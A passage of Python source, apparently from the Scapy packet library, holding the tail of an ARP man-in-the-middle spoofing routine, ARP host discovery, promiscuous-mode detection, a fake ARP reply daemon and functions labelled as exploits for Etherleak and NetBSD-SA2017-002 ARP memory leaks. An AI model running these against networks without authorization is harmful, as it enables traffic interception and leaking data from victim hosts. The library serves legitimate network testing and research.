in 969 Ether(dst=maca, src=target_mac) / 970 ARP(op="who-has", psrc=ipb, pdst=ipa, 971 hwsrc=target_mac, hwdst="00:00:00:00:00:00") 972 ), 973 (x 974 for ipb, macb in tup2 975 for ipa, _ in tup1 976 if ipb != ipa 977 for x in 978 Ether(dst=macb, src=target_mac) / 979 ARP(op="who-has", psrc=ipa, pdst=ipb, 980 hwsrc=target_mac, hwdst="00:00:00:00:00:00") 981 ), 982 )), 983 filter="arp and arp[7] = 2", 984 inter=inter, 985 iface=iface, 986 timeout=0.5, 987 verbose=1, 988 store=0, 989 ) 990 print("Restoring...") 991 sendp( 992 list(itertools.chain( 993 (x 994 for ipa, maca in tup1 995 for ipb, macb in tup2 996 if ipb != ipa 997 for x in 998 Ether(dst="ff:ff:ff:ff:ff:ff", src=macb) / 999 ARP(op="who-has", psrc=ipb, pdst=ipa, 1000 hwsrc=macb, hwdst="00:00:00:00:00:00") 1001 ), 1002 (x 1003 for ipb, macb in tup2 1004 for ipa, maca in tup1 1005 if ipb != ipa 1006 for x in 1007 Ether(dst="ff:ff:ff:ff:ff:ff", src=maca) / 1008 ARP(op="who-has", psrc=ipa, pdst=ipb, 1009 hwsrc=maca, hwdst="00:00:00:00:00:00") 1010 ), 1011 )), 1012 iface=iface 1013 ) 1014 1015 1016class ARPingResult(SndRcvList): 1017 def __init__(self, 1018 res=None, # type: Optional[Union[_PacketList[QueryAnswer], List[QueryAnswer]]] # noqa: E501 1019 name="ARPing", # type: str 1020 stats=None # type: Optional[List[Type[Packet]]] 1021 ): 1022 SndRcvList.__init__(self, res, name, stats) 1023 1024 def show(self, *args, **kwargs): 1025 # type: (*Any, **Any) -> None 1026 """ 1027 Print the list of discovered MAC addresses. 1028 """ 1029 data = list() # type: List[Tuple[str | List[str], ...]] 1030 1031 for s, r in self.res: 1032 manuf = conf.manufdb._get_short_manuf(r.src) 1033 manuf = "unknown" if manuf == r.src else manuf 1034 data.append((r[Ether].src, manuf, r[ARP].psrc)) 1035 1036 print( 1037 pretty_list( 1038 data, 1039 [("src", "manuf", "psrc")], 1040 sortBy=2, 1041 ) 1042 ) 1043 1044 1045@conf.commands.register 1046def arping(net: str, 1047 timeout: int = 2, 1048 cache: int = 0, 1049 verbose: Optional[int] = None, 1050 threaded: bool = True, 1051 **kargs: Any, 1052 ) -> Tuple[ARPingResult, PacketList]: 1053 """ 1054 Send ARP who-has requests to determine which hosts are up:: 1055 1056 arping(net, [cache=0,] [iface=conf.iface,] [verbose=conf.verb]) -> None 1057 1058 Set cache=True if you want arping to modify internal ARP-Cache 1059 """ 1060 if verbose is None: 1061 verbose = conf.verb 1062 1063 hwaddr = None 1064 if "iface" in kargs: 1065 hwaddr = get_if_hwaddr(kargs["iface"]) 1066 if isinstance(net, list): 1067 hint = net[0] 1068 else: 1069 hint = str(net) 1070 psrc = conf.route.route(hint, verbose=False)[1] 1071 if psrc == "0.0.0.0": 1072 if "iface" in kargs: 1073 psrc = get_if_addr(kargs["iface"]) 1074 else: 1075 warning( 1076 "No route found for IPv4 destination %s. " 1077 "Using conf.iface. Please provide an 'iface' !" % hint) 1078 psrc = get_if_addr(conf.iface) 1079 hwaddr = get_if_hwaddr(conf.iface) 1080 kargs["iface"] = conf.iface 1081 1082 ans, unans = srp( 1083 Ether(dst="ff:ff:ff:ff:ff:ff", src=hwaddr) / ARP( 1084 pdst=net, 1085 psrc=psrc, 1086 hwsrc=hwaddr 1087 ), 1088 verbose=verbose, 1089 filter="arp and arp[7] = 2", 1090 timeout=timeout, 1091 threaded=threaded, 1092 iface_hint=hint, 1093 **kargs, 1094 ) 1095 ans = ARPingResult(ans.res) 1096 1097 if cache and ans is not None: 1098 for pair in ans: 1099 _arp_cache[pair[1].psrc] = pair[1].hwsrc 1100 if ans is not None and verbose: 1101 ans.show() 1102 return ans, unans 1103 1104 1105@conf.commands.register 1106def is_promisc(ip, fake_bcast="ff:ff:00:00:00:00", **kargs): 1107 # type: (str, str, **Any) -> bool 1108 """Try to guess if target is in Promisc mode. The target is provided by its ip.""" # noqa: E501 1109 1110 responses = srp1(Ether(dst=fake_bcast) / ARP(op="who-has", pdst=ip), type=ETH_P_ARP, iface_hint=ip, timeout=1, verbose=0, **kargs) # noqa: E501 1111 1112 return responses is not None 1113 1114 1115@conf.commands.register 1116def promiscping(net, timeout=2, fake_bcast="ff:ff:ff:ff:ff:fe", **kargs): 1117 # type: (str, int, str, **Any) -> Tuple[ARPingResult, PacketList] 1118 """Send ARP who-has requests to determine which hosts are in promiscuous mode 1119 promiscping(net, iface=conf.iface)""" 1120 ans, unans = srp(Ether(dst=fake_bcast) / ARP(pdst=net), 1121 filter="arp and arp[7] = 2", timeout=timeout, iface_hint=net, **kargs) # noqa: E501 1122 ans = ARPingResult(ans.res, name="PROMISCPing") 1123 1124 ans.show() 1125 return ans, unans 1126 1127 1128class ARP_am(AnsweringMachine[Packet]): 1129 """Fake ARP Relay Daemon (farpd) 1130 1131 example: 1132 To respond to an ARP request for 192.168.100 replying on the 1133 ingress interface:: 1134 1135 farpd(IP_addr='192.168.1.100',ARP_addr='00:01:02:03:04:05') 1136 1137 To respond on a different interface add the interface parameter:: 1138 1139 farpd(IP_addr='192.168.1.100',ARP_addr='00:01:02:03:04:05',iface='eth0') 1140 1141 To respond on ANY arp request on an interface with mac address ARP_addr:: 1142 1143 farpd(ARP_addr='00:01:02:03:04:05',iface='eth1') 1144 1145 To respond on ANY arp request with my mac addr on the given interface:: 1146 1147 farpd(iface='eth1') 1148 1149 Optional Args:: 1150 1151 inter=<n> Interval in seconds between ARP replies being sent 1152 1153 """ 1154 1155 function_name = "farpd" 1156 filter = "arp" 1157 send_function = staticmethod(sendp) 1158 1159 def parse_options(self, IP_addr=None, ARP_addr=None, from_ip=None): 1160 # type: (Optional[str], Optional[str], Optional[str]) -> None 1161 if isinstance(IP_addr, str): 1162 self.IP_addr = Net(IP_addr) # type: Optional[Net] 1163 else: 1164 self.IP_addr = IP_addr 1165 if isinstance(from_ip, str): 1166 self.from_ip = Net(from_ip) # type: Optional[Net] 1167 else: 1168 self.from_ip = from_ip 1169 self.ARP_addr = ARP_addr 1170 1171 def is_request(self, req): 1172 # type: (Packet) -> bool 1173 if not req.haslayer(ARP): 1174 return False 1175 arp = req[ARP] 1176 return ( 1177 arp.op == 1 and 1178 (self.IP_addr is None or arp.pdst in self.IP_addr) and 1179 (self.from_ip is None or arp.psrc in self.from_ip) 1180 ) 1181 1182 def make_reply(self, req): 1183 # type: (Packet) -> Packet 1184 ether = req[Ether] 1185 arp = req[ARP] 1186 1187 if 'iface' in self.optsend: 1188 iff = cast(Union[NetworkInterface, str], self.optsend.get('iface')) 1189 else: 1190 iff, a, gw = conf.route.route(arp.psrc) 1191 self.iff = iff 1192 if self.ARP_addr is None: 1193 try: 1194 ARP_addr = get_if_hwaddr(iff) 1195 except Exception: 1196 ARP_addr = "00:00:00:00:00:00" 1197 else: 1198 ARP_addr = self.ARP_addr 1199 resp = Ether(dst=ether.src, 1200 src=ARP_addr) / ARP(op="is-at", 1201 hwsrc=ARP_addr, 1202 psrc=arp.pdst, 1203 hwdst=arp.hwsrc, 1204 pdst=arp.psrc) 1205 return resp 1206 1207 def send_reply(self, reply, send_function=None): 1208 # type: (Packet, Any) -> None 1209 if 'iface' in self.optsend: 1210 self.send_function(reply, **self.optsend) 1211 else: 1212 self.send_function(reply, iface=self.iff, **self.optsend) 1213 1214 def print_reply(self, req, reply): 1215 # type: (Packet, Packet) -> None 1216 print("%s ==> %s on %s" % (req.summary(), reply.summary(), self.iff)) 1217 1218 1219@conf.commands.register 1220def etherleak(target, **kargs): 1221 # type: (str, **Any) -> Tuple[SndRcvList, PacketList] 1222 """Exploit Etherleak flaw""" 1223 return srp(Ether() / ARP(pdst=target), 1224 prn=lambda s_r: conf.padding_layer in s_r[1] and hexstr(s_r[1][conf.padding_layer].load), # noqa: E501 1225 filter="arp", **kargs) 1226 1227 1228@conf.commands.register 1229def arpleak(target, plen=255, hwlen=255, **kargs): 1230 # type: (str, int, int, **Any) -> Tuple[SndRcvList, PacketList] 1231 """Exploit ARP leak flaws, like NetBSD-SA2017-002. 1232 1233https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc 1234 1235 """ 1236 # We want explicit packets 1237 pkts_iface = {} # type: Dict[str, List[Packet]] 1238 for pkt in ARP(pdst=target): 1239 # We have to do some of Scapy's work since we mess with 1240 # important values 1241 iface = conf.route.route(pkt.pdst)[0] 1242 psrc = get_if_addr(iface) 1243 hwsrc = get_if_hwaddr(iface) 1244 pkt.plen = plen 1245 pkt.hwlen = hwlen 1246 if plen == 4: 1247 pkt.psrc = psrc 1248 else: 1249 pkt.psrc = inet_aton(psrc)[:plen] 1250 pkt.pdst = inet_aton(pkt.pdst)[:plen] 1251 if hwlen == 6: 1252 pkt.hwsrc = hwsrc 1253 else: 1254 pkt.hwsrc = mac2str(hwsrc)[:hwlen] 1255 pkts_iface.setdefault(iface, []).append( 1256 Ether(src=hwsrc, dst=ETHER_BROADCAST) / pkt 1257 ) 1258 ans, unans = SndRcvList(), PacketList(name="Unanswered") 1259 for iface, pkts in pkts_iface.items(): 1260 ans_new, unans_new = srp(pkts, iface=iface, filter="arp", **kargs) 1261 ans += ans_new 1262 unans += unans_new 1263 ans.listname = "Results" 1264 unans.listname = "Unanswered" 1265 for _, rcv in ans: 1266 if ARP not in rcv: 1267 continue 1268 rcv = rcv[ARP] 1269 psrc = rcv.get_field('psrc').i2m(rcv, rcv.psrc) 1270 if plen > 4 and len(psrc) > 4: 1271 print("psrc") 1272 hexdump(psrc[4:]) 1273 print() 1274 hwsrc = rcv.get_field('hwsrc').i2m(rcv, rcv.hwsrc) 1275 if hwlen > 6 and len(hwsrc) > 6: 1276 print("hwsrc") 1277 hexdump(hwsrc[6:]) 1278 print() 1279 return ans, unans 1280